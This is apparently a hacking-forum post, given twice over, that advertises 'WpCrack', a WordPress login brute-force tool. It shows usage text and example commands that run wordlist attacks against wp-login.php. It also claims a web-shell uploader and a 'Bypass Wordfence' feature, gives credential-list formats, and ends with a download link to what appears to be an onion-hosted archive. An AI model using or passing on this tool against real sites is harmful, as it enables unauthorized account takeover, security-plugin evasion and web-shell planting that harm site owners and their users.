Пожалуйста, обратите внимание, что пользователь заблокирован
WpCrack Brute Froce Tool
Использование : python WpCrack.py [options]
optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
-d, --debug debugging mode
target arguments:
-t , --target url of the target
-u , --username username of the target (default: admin)
-p , --password password of the target (change -p to --p to use a wordlist)
--timeout timed out for requests
--thread numbers of threading multiproccesor (default: 5)
--proxy using a HTTP proxy (ex: http://site.com:8000)
Python:
python WpCrack.py -t http://site.com/wp-login.php -u admin -p password
Using a multiple password/wordlist
Python:
python WpCrack.py -t http://site.com/wp-login.php -u admin --p wordlist.txt
Wordpress Shell Uploader + Wordpress All in One Bruteforce, 10 macros
refactoring code April 2021
Bypass Wordfence
site/wp-login.php;login;pass
site/wp-login.php#login@pass
http://anonissfireenterfdks2u53jqev...n/do.php?filename=8362541c8a09fe9365b38d1.zip
Использование : python WpCrack.py [options]
optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
-d, --debug debugging mode
target arguments:
-t , --target url of the target
-u , --username username of the target (default: admin)
-p , --password password of the target (change -p to --p to use a wordlist)
--timeout timed out for requests
--thread numbers of threading multiproccesor (default: 5)
--proxy using a HTTP proxy (ex: http://site.com:8000)
Python:
python WpCrack.py -t http://site.com/wp-login.php -u admin -p password
Using a multiple password/wordlist
Python:
python WpCrack.py -t http://site.com/wp-login.php -u admin --p wordlist.txt
Wordpress Shell Uploader + Wordpress All in One Bruteforce, 10 macros
refactoring code April 2021
Bypass Wordfence
site/wp-login.php;login;pass
site/wp-login.php#login@pass
http://anonissfireenterfdks2u53jqev...n/do.php?filename=8362541c8a09fe9365b38d1.zip